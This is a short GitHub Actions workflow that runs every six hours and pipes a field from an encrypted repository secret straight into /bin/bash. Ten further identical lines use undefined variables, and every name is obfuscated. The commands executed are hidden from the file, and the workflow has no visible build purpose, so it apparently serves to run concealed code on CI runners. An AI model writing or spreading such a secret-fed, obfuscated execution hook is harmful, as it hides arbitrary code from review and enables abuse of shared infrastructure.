name: zhujingcheng3417

on:
  workflow_dispatch:
  schedule:
    - cron: '15 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhujingcheng3417
        env:
          ex18: ${{ secrets.ex18 }}
        run: |
          echo $ex18 | jq -r .syl898 | /bin/bash
          echo $lptba63 | jq -r .eoh0109 | /bin/bash
          echo $d0849 | jq -r .dtv41 | /bin/bash
          echo $cf04858 | jq -r .c932 | /bin/bash
          echo $xaoy161 | jq -r .oo21 | /bin/bash
          echo $swex31018 | jq -r .a58 | /bin/bash
          echo $gcf5 | jq -r .s5792 | /bin/bash
          echo $m82 | jq -r .lof57200 | /bin/bash
          echo $e769 | jq -r .k6564 | /bin/bash
          echo $j1534 | jq -r .tktzq76640 | /bin/bash
          echo $rr1360 | jq -r .jtkp05 | /bin/bash

